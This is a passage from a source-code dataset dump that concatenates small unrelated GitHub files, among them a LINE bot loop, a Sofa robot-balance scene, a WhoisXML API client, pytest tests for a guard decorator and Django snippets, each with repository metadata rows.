if Name in RfuCctv['sidermem'][op.param1]:
pass
else:
RfuCctv['sidermem'][op.param1] += "\n " + Name + "\n"
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
line.sendMessage(op.param1, "Nah " +nick[0])
summon(op.param1, [op.param2])
else:
pass
else:
pass
except:
pass
if op.type == 55:
print ("[ 55 ] ")
try:
if op.param1 in read['readPoint']:
if op.param2 in read['readMember'][op.param1]:
pass
else:
read['readMember'][op.param1] += op.param2
read['ROM'][op.param1][op.param2] = op.param2
backupData()
else:
pass
except:
pass
except Exception as error:
logError(error)
#==============================================================================#
# Main long-poll loop: fetch up to 50 pending operations, dispatch each
# one to lineBot(), then advance the poll revision marker (presumably so
# the same operation is not delivered again -- confirm against the
# oepoll client).  Errors are logged and the loop keeps running forever.
while True:
    try:
        ops = oepoll.singleTrace(count=50)
        if ops is not None:
            for op in ops:
                lineBot(op)
                oepoll.setRevision(op.revision)
    except Exception as e:
        logError(e)
| [
"noreply@github.com"
] | noreply@github.com |
465ad821dd26762dbe90a07f2a9c32c0f4f0758e | a554def1522ab3d58f2a85027f985c01fa159aa2 | /app.py | edb289e677b9c8d5162ac59a9ba0e0c2f82f2976 | [] | no_license | geraldoalm/FirstGit | 389574b287948a7626a1c31115e9124f66f4e80c | ca6c39d54b21a490a09491073753ca0a25c1fbc0 | refs/heads/master | 2020-05-07T18:35:25.688254 | 2019-04-11T11:22:28 | 2019-04-11T11:22:28 | 180,774,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | from calculator import total,product
# Smoke-test of the local calculator module: print the results of
# total(2, 3) and product(2, 3), labelled as sum and product.
print("The sum is :",total(2,3))
print("The product is :",product(2,3))
| [
"geraldoalm12345@gmail.com"
] | geraldoalm12345@gmail.com |
5bd6c962c4630dabef0a1ee828ebb0886814655c | a91cb8785be8ba51831b815deb0eb1dd59b9a9a8 | /scene/step.py | c56dba461e5a064169fad65a8f9ec80f3f828a68 | [] | no_license | maxime-tournier/pouf | 137f1917cb6deea21fd75f4767b9fbdbdd4adb39 | afe6ec8d408b3b1b199576106887d3feb12447fc | refs/heads/master | 2021-01-18T23:27:12.598897 | 2016-05-25T13:30:49 | 2016-05-25T13:30:49 | 18,585,362 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,481 | py | import Sofa
import pouf
from pouf import robot
from pouf import rigid
from pouf import joint
from pouf import control
from pouf import script
from pouf import pose
from pouf import contact
from pouf import tool
import Compliant
from Compliant import Tools
from pouf.tool import concat
import math
import numpy as np
# pouf package path helper; the value is unused in this file's visible
# code -- presumably kept for locating scene assets (confirm).
path = pouf.path()
class Script:
    """Sofa scene script: per-step hooks called by the simulation runtime.

    The attributes it uses (servo, balance, fsm, robot, ground) are
    injected externally by createScene() after construction.
    """
    def __init__(self):
        # Balance estimator; set by createScene() before the first step.
        self.balance = None
    def onBeginAnimationStep(self, dt):
        # Pre-step: prepare the PID servo, refresh the balance
        # estimates, then advance the finite-state machine.
        self.servo.pre_step(dt)
        self.balance.update(dt)
        self.fsm.step()
        return 0
    def onEndAnimationStep(self, dt):
        # Post-step bookkeeping for the servo controller.
        self.servo.post_step(dt)
        return 0
    def reset(self):
        # Scene reset: clear servo state and restart the state machine.
        self.servo.reset()
        self.fsm.start()
        return 0
    def draw(self):
        # Debug drawing for the balance estimator, once it exists.
        if self.balance != None:
            self.balance.draw()
        return 0
class StateMachine:
    """Balance FSM driven by pouf.control.FSM.

    States name the stance ('both', 'left', 'right'); the FSM calls the
    enter_*/while_* hooks and the transition predicates listed by name
    in self.transitions.
    """
    def __init__(self, balance, cop, com):
        # Transition table entries are (predicate name, source, destination).
        self.states = ['start', 'both', 'left', 'right']
        self.transitions = [
            ('always', 'start', 'both'),
            ('wait', 'both', 'left'),
            ('wait', 'both', 'right'),
            ('wait', 'left', 'both'),
            ('wait', 'right', 'both')
        ]
        self.start = 'start'
        # Collaborators: balance estimator and the CoP/CoM constraints
        # (com is passed as None by createScene -- that constraint is
        # disabled there).
        self.balance = balance
        self.cop = cop
        self.com = com
        # Secant (Broyden) estimates sized like the CoP constraint matrix,
        # updated in update() from the constrained velocity.
        self.H = np.zeros( np.shape(self.cop.matrix) )
        self.L = np.zeros( np.shape(self.cop.matrix) )
    # transitions
    def always(self):
        # Unconditional transition (used for start -> both).
        return True
    def wait(self):
        # True once the current state has been active for more than 1 s.
        return self.balance.robot.node.getTime() - self.time > 1
    # states
    def enter(self):
        # Common entry hook: record the entry time used by wait().
        self.time = self.balance.robot.node.getTime()
    def enter_start(self):
        self.enter()
    def update(self):
        # Broyden-style updates relating the constrained velocity u to
        # angular momentum (H) and to linear momentum m*dcom (L) -- see
        # pouf.control.broyden for the exact update rule.
        u = self.cop.constrained_velocity()
        m = self.balance.robot.mass
        pouf.control.broyden(self.H, u, self.balance.am);
        pouf.control.broyden(self.L, u, m * self.balance.dcom);
    def enter_both(self):
        self.enter()
    def while_both(self):
        # Only act while a support polygon exists (contact centroid known).
        self.cop.enable( self.balance.centroid != None )
        if self.cop.enabled():
            self.update()
            m = self.balance.robot.mass
            # desired cop
            cop = self.balance.centroid
            # Lever arm from the contact centroid to the center of mass.
            s = self.balance.com - cop
            current = self.balance.am + np.cross(s, m * self.balance.dcom)
            g = self.balance.gravity
            lf = pouf.rigid.translation(self.balance.robot.lfoot.node)
            rf = pouf.rigid.translation(self.balance.robot.rfoot.node)
            mid = 0.5 * (lf + rf)
            # NOTE(review): cop is rebound to mid here (same array object),
            # so the next assignment also overwrites mid[1]; the earlier
            # centroid value of cop is only used through s above.
            cop = mid
            cop[1] = self.balance.centroid[1]
            # Horizontal spring pulling the CoM toward the mid-feet point.
            spring = mid - self.balance.com
            spring[1] = 0
            f = m * g + spring * 2e3
            dt = self.balance.dt
            # Assemble the CoP constraint (matrix and value) for the solver.
            self.cop.matrix = self.H + pouf.tool.hat(s + dt * f).dot(self.L)
            self.cop.value = dt * (current + dt * np.cross(s, f))
            self.cop.update()
            # NOTE(review): target is computed but never used -- presumably
            # intended for the disabled com constraint below.
            target = np.array( [mid[0], mid[2]] )
            # self.com.matrix = self.L
            # self.cop.value
def createScene(node):
    """Sofa entry point: build the humanoid balance scene.

    Creates the constraint solver, ground and robot, a PID servo holding
    a standing pose, the center-of-pressure (CoP) constraint, the balance
    estimator and the FSM, then wires everything into a Script instance
    whose per-step hooks drive the controller.
    """
    scene = pouf.tool.scene( node )
    # PGS solver for the contact/constraint problem.
    num = node.createObject('pouf.pgs',
                            iterations = 50,
                            precision = 0)
    ode = node.getObject('ode')
    # ode.stabilization = True
    # ground
    ground = pouf.tool.ground(scene)
    # robot
    robot = pouf.robot.Humanoid('robot')
    robot.insert( scene )
    # servo: PID joint controller initialized to a standing pose
    servo = pouf.control.PID(robot)
    pouf.pose.setup( servo )
    servo.set('pos', pouf.pose.stand() )
    # cop control: constraint over all joint dofs, dimension 3
    dofs = [ j.node.getObject('dofs') for j in robot.joints ]
    cop = pouf.control.Constraint('constraint', node, dofs, 3)
    cop.compliance = 1e1
    cop.damping = 0
    # com = pouf.control.Constraint('constraint', node, dofs, 2)
    # com.compliance = 1e14
    # com.damping = 10
    # script
    script = Script()
    pouf.script.insert( node, script )
    # balance stuff
    balance = pouf.contact.Balance(robot, ground)
    # zero the integral gains: pure PD tracking
    for p in servo.pid:
        p.ki = 0
    # fsm (the com constraint is disabled, hence None)
    fsm = pouf.control.FSM( StateMachine(balance, cop, None) )
    # inject the collaborators the Script hooks rely on
    script.balance = balance
    script.robot = robot
    script.servo = servo
    script.ground = ground
    script.fsm = fsm
    return 0
| [
"maxime.tournier@brain.riken.jp"
] | maxime.tournier@brain.riken.jp |
adf8bcf70a7abd41c6617653f5ac599ad6aff3cc | f260ff31ba63e9cd35e21b99c577107c46135a0d | /test005/test_reduce.py | 2b49c6ecf3d3ee5062e62b927f5198f055b7b5fd | [] | no_license | wscfan/pythoncode | e1cc882139931f4257528e274f443c3c8217ec8d | 4bbe06f47b046a5078e8dd0f2ae9ccb9eeb01743 | refs/heads/master | 2021-03-20T21:12:58.580056 | 2020-12-19T16:38:10 | 2020-12-19T16:38:10 | 247,234,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from functools import reduce
def get_sum_use_python(l):
    """Sum the numbers in *l* using the built-in sum()."""
    total = sum(l)
    return total
def f(m, n):
    """Binary addition helper used as the reducer callback."""
    result = m + n
    return result
def get_sum_use_reduce(l):
    """Sum the numbers in *l* by folding with reduce() and the named
    helper f.

    The initial value 0 makes an empty sequence return 0 (matching the
    built-in sum()) instead of raising TypeError, which reduce() does
    when given no items and no initializer.
    """
    return reduce(f, l, 0)
def get_sum_use_lambda(l):
    """Sum the numbers in *l* with reduce() and an inline lambda.

    The initial value 0 makes an empty sequence return 0 (matching the
    built-in sum()) instead of raising TypeError, which reduce() does
    when given no items and no initializer.
    """
    return reduce(lambda m, n: m + n, l, 0)
if __name__ == "__main__":
    # Demo: compute the same sum three ways (built-in sum, reduce with a
    # named helper, reduce with a lambda) and print the results,
    # separated by marker lines.
    l = [1, 2, 3, 5, 7]
    print(get_sum_use_python(l))
    print('------------------')
    print(get_sum_use_reduce(l))
    print('+++++++++++++++++++')
    print(get_sum_use_lambda(l))
"wshappyday@sina.com"
] | wshappyday@sina.com |
2a762d43d44142359945b21e58d56b6dea95b604 | 7e30a9a5170bb54897e808785c3daa58c1a3e19b | /sim/utils.py | 92aa4d07f50bb913a20d049cbca7cbf6d33a1659 | [
"MIT"
] | permissive | jmagine/multiuav-rf | 5ab8d80061d368a6f0b92dc62c2c135189270099 | ba9dcb5ca550916873ce68baa71da983f2dd4be5 | refs/heads/master | 2023-01-07T12:43:37.156868 | 2020-11-02T17:12:55 | 2020-11-02T17:12:55 | 226,418,281 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py |
import numpy as np
import math
def calc_rates_fdma(a, q, f, d, I, gt, gamma):
    # Placeholder for an FDMA variant of calc_rates(): the rate matrix is
    # allocated but the per-slot/per-UAV loop body is empty, and the
    # function implicitly returns None.  Signature mirrors calc_rates().
    K, M = I.shape
    r = np.zeros((K, M))
    for n in range(M):
        for k in range(K):
            pass
    pass
def calc_rates(a, q, f, d, I, gt, gamma):
    """Per-link achievable rates (base-2 log units) under co-channel
    interference.

    Args:
        a: K x M array-like of transmit amplitudes; a[k][n] is UAV k's
           amplitude in time slot n.
        q: unused; kept for interface compatibility with callers.
        f: mapping from a frequency/channel key to the list of UAV
           indices sharing that channel -- only UAVs on the same channel
           interfere with each other.
        d: K x K x M array-like; d[j][k][n] is the distance/path-loss
           factor from transmitter j to receiver k in slot n.
        I: K x M array; only its shape is used to size the result.
        gt: unused; kept for interface compatibility.
        gamma: scalar SNR coefficient applied to every power term.

    Returns:
        K x M numpy array r with
        r[k][n] = log2(1 + S_k) - log2(1 + N_k), where S_k sums the
        received power from every co-channel transmitter and N_k sums
        only the interferers (j != k).
    """
    K, M = I.shape
    r = np.zeros((K, M))
    for freq in f:
        uav_idxs = f[freq]
        for n in range(M):
            for k in uav_idxs:
                signal = 1.0
                noise = 1.0
                for j in uav_idxs:
                    # Received power of transmitter j at receiver k,
                    # computed once and shared by both accumulators.
                    term = gamma * a[j][n] ** 2 / d[j][k][n]
                    signal += term
                    if j != k:
                        noise += term
                # SINR as a difference of logs; math.log2 is more
                # accurate than math.log(x, 2).
                r[k][n] = math.log2(signal) - math.log2(noise)
    return r
def dist(pos_0, pos_1):
    """Euclidean distance between two equal-length coordinate sequences."""
    difference = np.array(pos_0) - np.array(pos_1)
    return np.linalg.norm(difference)
def dist2(pos_0, pos_1, h_min):
    """3-D distance from (x0, y0, h_min) to (x1, y1, 0).

    Treats the first point as hovering at altitude h_min and the second
    as lying on the ground plane.
    """
    elevated = np.array([pos_0[0], pos_0[1], h_min])
    grounded = np.array([pos_1[0], pos_1[1], 0])
    return np.linalg.norm(elevated - grounded)
def power_fspl(pw_tx, freq, dist):
    """Received signal power in dB after free-space path loss.

    pw_tx is the transmit power in dB; freq and dist feed the standard
    FSPL expression 20*log10(4*pi/300 * freq * dist).  A non-positive
    frequency or distance is treated as "no loss".
    """
    if dist > 0 and freq > 0:
        path_loss = 20 * math.log10(4 * math.pi / 300 * freq * dist)
        return pw_tx - path_loss
    return pw_tx
"jasonma5501@gmail.com"
] | jasonma5501@gmail.com |
b5c3ee3c6030d006925a30c43b0ae563408aeda9 | fe6775ca8c5b42710785e3a923974ae079f92c8f | /剑指offer/剑指 Offer 55 - I. 二叉树的深度.py | 53759e4232eb424671a0c80016e248c07bbe847d | [] | no_license | AiZhanghan/Leetcode | 41bda6676fa1a25fa19e393553c1148ed51fdf72 | 101bce2fac8b188a4eb2f5e017293d21ad0ecb21 | refs/heads/master | 2021-06-28T10:48:07.865968 | 2020-11-20T09:45:15 | 2020-11-20T09:45:15 | 188,155,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # Definition for a binary tree node.
class TreeNode:
    """Binary tree node: a value plus left/right child links."""
    def __init__(self, x):
        self.val = x        # node payload
        self.left = None    # left child (TreeNode or None)
        self.right = None   # right child (TreeNode or None)
class Solution:
    def maxDepth(self, root):
        """Return the number of nodes on the longest root-to-leaf path.

        Args:
            root: TreeNode, root of the (possibly empty) tree.
        Return:
            int: 0 for an empty tree, otherwise one more than the
            deeper of the two subtree depths.
        """
        if not root:
            return 0
        return 1 + max(self.maxDepth(root.left), self.maxDepth(root.right))
"35103759+AiZhanghan@users.noreply.github.com"
] | 35103759+AiZhanghan@users.noreply.github.com |
4f558c18905639160671530a35dbbf592d71058c | a15200778946f6f181e23373525b02b65c44ce6e | /Algoritmi/2019-06-25/all-CMS-submissions/2019-06-25.10:26:54.215386.VR432075.biancaneve.py | 959fb7d91ea8ff4d2875e8281f77063d1dc829c4 | [] | no_license | alberto-uni/portafoglioVoti_public | db518f4d4e750d25dcb61e41aa3f9ea69aaaf275 | 40c00ab74f641f83b23e06806bfa29c833badef9 | refs/heads/master | 2023-08-29T03:33:06.477640 | 2021-10-08T17:12:31 | 2021-10-08T17:12:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,383 | py | """
* user: VR432075
* fname: BUSATTO
* lname: ALESSANDRO
* task: biancaneve
* score: 2.0
* date: 2019-06-25 10:26:54.215386
"""
from __future__ import print_function
import sys
# Python 2 compatibility: make input() read a raw line (as in Python 3)
# instead of evaluating it.
if sys.version_info<(3,0):
    input=raw_input
def scambia(nani,p1,p2):
    """Swap the dwarves at 1-based positions p1 and p2 in place."""
    nani[p1 - 1], nani[p2 - 1] = nani[p2 - 1], nani[p1 - 1]
def check(nani, h1, h2):
    """Return 1 if some contiguous window of dwarves has total height
    equal to the sum h1 + (h1+1) + ... + h2, else 0.

    Scans candidate windows from the right while the cumulative sum can
    still reach the target (same pruning as the original loop).
    """
    window = h2 - h1 + 1
    target = sum(range(h1, h2 + 1))
    # prefix[i] is the total height of the first i dwarves.
    prefix = [0]
    for height in nani:
        prefix.append(prefix[-1] + height)
    idx = len(prefix) - 1
    while idx - window >= 0 and prefix[idx] >= target:
        if prefix[idx] - prefix[idx - window] == target:
            return 1
        idx -= 1
    return 0
def main():
    """Read the dwarf heights, then process m queries from stdin.

    Input: a line "n m", a line of n heights, then m lines "t p1 p2".
      t == 1: swap the dwarves at 1-based positions p1 and p2.
      otherwise: print YES/NO depending on whether some contiguous
      window of dwarves matches the total of heights p1..p2 (check()).
    """
    n, m = map(int, input().split())
    # Materialize the heights: under Python 3, map() returns a lazy
    # iterator, which scambia() cannot index and check() cannot len() --
    # the original crashed here on Python 3.  Under Python 2 (where the
    # raw_input shim above applies) list(...) is a harmless copy.
    nani = list(map(int, input().split()))
    for _ in range(m):
        t, p1, p2 = map(int, input().split())
        if t == 1:
            scambia(nani, p1, p2)
        else:
            if check(nani, p1, p2) == 1:
                print("YES")
            else:
                print("NO")

if __name__ == '__main__':
    main()
"romeo.rizzi@univr.it"
] | romeo.rizzi@univr.it |
65d85f49f25191d7cd79893a30280262f4c997df | 6ffd2cb3c32d16d2a4dba3c5e894a62bd96ba0a9 | /posts/migrations/0003_auto_20170717_1753.py | b4acaae8cb8ffc6820d9d53226fc3dae27f1a9a7 | [] | no_license | kruwaih/blog | fe973227678d7da897d9cbca842cab0d54fedcaa | b583786e82806e90ddd116ab8617ae14c1cace47 | refs/heads/master | 2022-12-08T23:23:37.005038 | 2017-08-15T17:57:40 | 2017-08-15T17:57:40 | 98,108,089 | 0 | 1 | null | 2022-12-08T00:42:38 | 2017-07-23T15:42:14 | Python | UTF-8 | Python | false | false | 422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-17 17:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Must run after the migration that introduced the SecondPost model.
    dependencies = [
        ('posts', '0002_secondpost'),
    ]
    # Rename the SecondPost field 'email' to 'email_val' (schema-only).
    operations = [
        migrations.RenameField(
            model_name='secondpost',
            old_name='email',
            new_name='email_val',
        ),
    ]
| [
"kruwaih@khaleds-MacBook-Pro.local"
] | kruwaih@khaleds-MacBook-Pro.local |
57e67cb1df112ea531e501e57188eaec98f19f3d | 4e2a41ca6d13d3b04bbd7c087094a77a374500fa | /clang-format.py | 6a9828ef51f4268d53079eaa68c7647d54d9ac54 | [] | no_license | bourdibay/Qt-prototypes | 36803054e75e84112a8b6a4b427c257d7a016558 | eb57097cb84925cd55b6e82334a87806af3aaa2e | refs/heads/master | 2021-01-10T19:09:36.742710 | 2014-07-13T09:02:49 | 2014-07-13T09:02:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | # This script run clang-format on all the source files
# in order to share a common and uniform syntax style.
import fnmatch
import os
# Collect every C++ source/header (.cpp/.h/.hpp) under the prototype
# directories listed below.
matches = []
for dir_to_check in ['./ListProto', './ModelSharing', './Scintilla',
                     './SideAreaManagement', './TextEditor', './TreeProto']:
    for root, dirnames, filenames in os.walk(dir_to_check):
        for filename in filenames:
            if filename.endswith(('.cpp', '.h', '.hpp')):
                matches.append(os.path.join(root, filename))
# NOTE: this is a Python 2 script (print statements, raw_input below).
print "Files to format: {0}".format(matches)
# NOTE(review): joining with spaces breaks if any path contains a space;
# quoting each path (or invoking clang-format per file) would be safer.
files = ' '.join(matches)
os.system("C:/LLVM/LLVM_Release_Win64/bin/clang-format.exe -i " + files)
print "Done (press Enter to exit)"
raw_input() # to pause the program for Windows
| [
"benjamin.bourdin40@gmail.com"
] | benjamin.bourdin40@gmail.com |
4d6c0ca013275f8ac616c2537d1a06bf1ecfd9dd | fe0813eba877ddebfa3292e8d2db7be3a8d36e64 | /leetcode/bit_operation/137.py | cbece34e139bf8214c38dfbbdad501fc6a8d326d | [
"MIT"
] | permissive | 1lch2/PythonExercise | 409b367101ce5cbcd739c9c312a3d398e5b38811 | 9adbe5fc2bce71f4c09ccf83079c44699c27fce4 | refs/heads/master | 2021-07-18T05:39:42.985221 | 2021-01-15T11:01:19 | 2021-01-15T11:01:19 | 229,878,839 | 1 | 0 | null | 2020-02-21T05:30:28 | 2019-12-24T05:49:16 | Python | UTF-8 | Python | false | false | 995 | py | # 给定一个非空整数数组,除了某个元素只出现一次以外,其余每个元素均出现了三次。找出那个只出现了一次的元素。
# 说明:
# 你的算法应该具有线性时间复杂度。 你可以不使用额外空间(常数空间)来实现吗?
# 示例 1:
# 输入: [2,2,3,2]
# 输出: 3
# 示例 2:
# 输入: [0,1,0,1,0,1,99]
# 输出: 99
from typing import List
class Solution:
    def singleNumber(self, nums: List[int]) -> int:
        """Arithmetic approach: every repeated value appears exactly
        three times, so 3 * sum(unique values) - sum(all values) equals
        twice the element that appears once."""
        unique_total = sum(set(nums))
        return (3 * unique_total - sum(nums)) // 2
# https://leetcode-cn.com/problems/single-number-ii/solution/single-number-ii-mo-ni-san-jin-zhi-fa-by-jin407891/
class Solution1:
    def singleNumber(self, nums: List[int]) -> int:
        """Bitwise approach in O(1) extra space.

        Each bit position carries a counter modulo 3 encoded across the
        two accumulators (high, low); after all elements are folded in,
        low holds exactly the bits of the value seen once.
        """
        high, low = 0, 0
        for value in nums:
            # Order matters: low is updated first, then high reads the
            # new low -- this implements the mod-3 state transition.
            low = (low ^ value) & ~high
            high = (high ^ value) & ~low
        return low
| [
"1lch2@163.com"
] | 1lch2@163.com |
9f9641fb2004477a918cfa465ea0687a2cfd391c | eaaa1bbceb9a867e08769aae07c37c5e1107e430 | /mitx_6.00.1x_ics_py/examples/lectureCode_Lec5-fib.py | 1825c83576b55e08886bfcd0acf5f707779b8de7 | [] | no_license | nwinds/jugar | c8f9ce11dd95c6e0dda22e22a69dd598b34d9d3c | db4d362d9d1dd04f2c6c013d4462de0c892b8314 | refs/heads/master | 2020-12-24T16:35:03.951580 | 2016-03-10T09:25:06 | 2016-03-10T09:25:06 | 41,397,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | def fib(x):
"""assumes x an int >= 0
returns Fibonacci of x"""
# Base case:
# Female(0) = 1, Female(1) = 1
assert type(x) == int and x >= 0
if x == 0 or x == 1:
return 1
else:
return fib(x-1) + fib(x-2)
| [
"namingwinds@gmail.com"
] | namingwinds@gmail.com |
2d2b43ef2d5afadf787cce63d8514ef29e08e146 | 9977d90d93d5d11f3746dfbc6f80df8446f993ec | /src/users/migrations/0007_auto_20171109_1333.py | 5272b8f597d788b866b306e525296723fbdf3f69 | [] | no_license | murkeirluh/Medical-Center-Manager | 8f38575328c0b1da1c6439d1836c667002f70715 | fa7582673bcf1023f5331972e3d856476ffbf45b | refs/heads/master | 2020-03-15T06:14:06.433680 | 2017-12-05T07:04:32 | 2017-12-05T07:04:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-09 05:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Requires the dashboard Product model and the previous users migration.
    dependencies = [
        ('dashboard', '0003_auto_20171109_1327'),
        ('users', '0006_auto_20171108_1551'),
    ]
    operations = [
        # Through-model linking an administrator to a product with a
        # per-admin price and stock level.
        migrations.CreateModel(
            name='AdministratorProducts',
            fields=[
                ('admin_product_id', models.AutoField(primary_key=True, serialize=False)),
                ('price', models.FloatField()),
                ('stock', models.IntegerField()),
                ('admin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.AdministratorDetails')),
                ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dashboard.Product')),
            ],
        ),
        # Expose the relation as a many-to-many field on AdministratorDetails
        # that goes through the new AdministratorProducts table.
        migrations.AddField(
            model_name='administratordetails',
            name='products',
            field=models.ManyToManyField(through='users.AdministratorProducts', to='dashboard.Product'),
        ),
    ]
| [
"gchase.patron@gmail.com"
] | gchase.patron@gmail.com |
a52d697057d4bb0491b592c7413e0b26fe50b949 | a7d79633d0034afcca44920bd050ad36969fcdf2 | /test/test_guard.py | 2d852596a16766308a55be5a4ce8b79093f5b854 | [
"MIT"
] | permissive | s-m-i-t-a/railroad | b59439321745866c0bcc82d3bddba4131f798ed8 | ddb4afa018b8523b5d8c3a86e55388d1ea0ab37c | refs/heads/master | 2020-04-15T16:53:41.159916 | 2016-11-25T13:32:37 | 2016-11-25T13:32:37 | 41,478,581 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,502 | py | # -*- coding: utf-8 -*-
import pytest
from mock import Mock, call
from railroad import guard, GuardError
def fn(a, b, c, d='foo'):
    """Sample target function: echoes its arguments back as a tuple."""
    return a, b, c, d
def test_guard_call_guarded_function():
    # A guard whose predicate passes is transparent: the wrapped
    # function runs and its return value comes through unchanged.
    def fn(a):
        return a
    guarded = guard('a', lambda a: True)(fn)
    result = guarded('foo')
    assert result == 'foo'
def test_guard_pass_only_selected_paramters_to_guardian():
    # Only the named parameters ('b' and 'a') are forwarded to the
    # guardian, as keyword arguments, regardless of their listing order.
    guardian = Mock()
    guarded = guard(['b', 'a'], guardian)(fn)
    guarded(1, 2, 3, 4)
    assert guardian.called
    assert guardian.call_args == call(a=1, b=2)
def test_guard_raise_exception_when_guardian_return_false():
    # A falsy guardian verdict aborts the call with the default GuardError.
    def fn(a):
        return a
    guarded = guard('a', lambda a: False)(fn)
    with pytest.raises(GuardError):
        guarded('foo')
def test_guard_raise_custom_exception():
    # The optional third argument overrides the exception type raised
    # when the guardian rejects the call.
    def fn(a):
        return a
    class MyError(Exception):
        pass
    guarded = guard('a', lambda a: False, MyError)(fn)
    with pytest.raises(MyError):
        guarded('foo')
def test_guard_called_with_pramas_as_string():
    # A single parameter may be given as a plain string instead of a
    # list; 'ab' must match the parameter name exactly (not prefix 'a').
    def fn(a, ab):
        return ab
    guarded = guard('ab', lambda ab: True)(fn)
    result = guarded(1, 'foo')
    assert result == 'foo'
def test_combined_guard_call_each_guarded_function():
    # Stacked guard decorators compose: each guardian receives exactly
    # its own named parameter from the same call.
    g1 = Mock()
    g2 = Mock()
    @guard('a', g1)
    @guard('b', g2)
    def fn(a, b, c):
        return (a, b, c)
    fn(1, 2, 3)
    assert g1.called
    assert g1.call_args == call(a=1)
    assert g2.called
    assert g2.call_args == call(b=2)
| [
"jsmitka@smita.info"
] | jsmitka@smita.info |
1770ff429817f3ae0b07000ea4ab431db2bb71c9 | ac4e74f42b1e1395da8d7625a081806ec7d7e2dc | /apikey/python/whois.py | faedafdb103f5f6518bf08f57696f8cd19f4d33d | [] | no_license | whois-api-llc/whois | 84866d4d13d9e80674ef98e173470f808c151f12 | acc18f9781754695383b455e792275effe7925aa | refs/heads/master | 2023-05-06T06:58:21.286190 | 2022-06-23T06:24:14 | 2022-06-23T06:24:14 | 113,178,095 | 0 | 1 | null | 2023-04-14T17:39:14 | 2017-12-05T12:16:06 | C# | UTF-8 | Python | false | false | 2,850 | py | try:
# For Python v.3 and later
from urllib.parse import quote
from urllib.request import urlopen, pathname2url
except ImportError:
# For Python v.2
from urllib import pathname2url
from urllib2 import urlopen, quote
import base64
import hashlib
import hmac
import json
import time
# WhoisXML API account credentials -- replace with real values before running.
username = 'Your whois api username'
api_key = 'Your whois api key'
secret = 'Your whois api secret key'
# Domains whose WHOIS records will be queried, in order.
domains = [
    'google.com',
    'example.com',
    'whoisxmlapi.com',
    'twitter.com'
]
# WhoisService REST endpoint.
url = 'https://whoisxmlapi.com/whoisserver/WhoisService'
def build_request(req_username, req_timestamp, req_digest, req_domain):
    """Build the WhoisService query string.

    The username/timestamp pair is JSON-encoded then base64-encoded and
    sent as the ``requestObject`` parameter, alongside the URL-escaped
    digest and domain name; JSON output format is always requested.
    """
    payload = json.dumps({'u': req_username, 't': req_timestamp})
    encoded = base64.b64encode(bytearray(payload.encode('utf-8')))
    parts = [
        '?requestObject=' + pathname2url(encoded.decode('utf-8')),
        '&digest=' + pathname2url(req_digest),
        '&domainName=' + pathname2url(req_domain),
        '&outputFormat=json',
    ]
    return ''.join(parts)
def generate_digest(req_username, req_timestamp, req_key, req_secret):
    """Return the URL-quoted hex HMAC-MD5 of username+timestamp+key,
    keyed with the account secret (the API's request signature)."""
    message = '{0}{1}{2}'.format(req_username, req_timestamp, req_key)
    signature = hmac.new(bytearray(req_secret.encode('utf-8')),
                         bytearray(message.encode('utf-8')),
                         hashlib.md5)
    return quote(str(signature.hexdigest()))
def generate_params(req_username, req_key, req_secret):
    """Return a (timestamp_ms, digest) pair for a fresh signed request.

    The timestamp is the current wall-clock time in milliseconds; the
    digest is derived from it via generate_digest().
    """
    now_ms = int(round(time.time() * 1000))
    return now_ms, generate_digest(req_username, now_ms, req_key, req_secret)
def print_response(req_response):
    """Print selected fields of a WhoisService JSON response.

    For each of contactEmail / createdDate / expiresDate present in the
    WhoisRecord object, print a label line followed by the value line.
    Responses without a WhoisRecord produce no output.
    """
    response_json = json.loads(req_response)
    if 'WhoisRecord' not in response_json:
        return
    record = response_json['WhoisRecord']
    for field, label in (('contactEmail', 'Contact Email: '),
                         ('createdDate', 'Created date: '),
                         ('expiresDate', 'Expires date: ')):
        if field in record:
            print(label)
            print(record[field])
def request(req_url, req_username, req_timestamp, req_digest, req_domain):
    # Issue the signed HTTP GET against the WhoisService endpoint and
    # return the UTF-8-decoded response body.
    req = build_request(req_username, req_timestamp, req_digest, req_domain)
    return urlopen(req_url + req).read().decode('utf8')
# Sign once, then query each domain.  If the server reports the signature
# has timed out, regenerate the timestamp/digest pair and retry once.
timestamp, digest = generate_params(username, api_key, secret)
for domain in domains:
    response = request(url, username, timestamp, digest, domain)
    if 'Request timeout' in response:
        timestamp, digest = generate_params(username, api_key, secret)
        response = request(url, username, timestamp, digest, domain)
    print_response(response)
    print('---------------------------\n')
| [
"support@whoisxmlapi.com"
] | support@whoisxmlapi.com |
a1d445d782aac6e469879fd17abeb935b4bc2324 | b5ad47c2bc4bbb847540c7ecace86c316d29e8db | /blog/views.py | b3670a43eb5a23533c7abb01cc5feaa3104fb534 | [] | no_license | miguelgarcia18/my-first-blog | 76c0ce2f3bd6506a22b208396e33d77827cca764 | 6c9160a332b64d71e4fbe0aa08afd0d4e1fcad25 | refs/heads/master | 2023-01-19T07:09:35.660886 | 2020-11-18T04:06:52 | 2020-11-18T04:06:52 | 304,738,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,792 | py | from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone

from .models import Post, Comment
from .forms import PostForm, CommentForm
# Create your views here.
def post_list(request):
    """Render every already-published post, oldest first."""
    published = Post.objects.filter(
        published_date__lte=timezone.now()
    ).order_by('published_date')
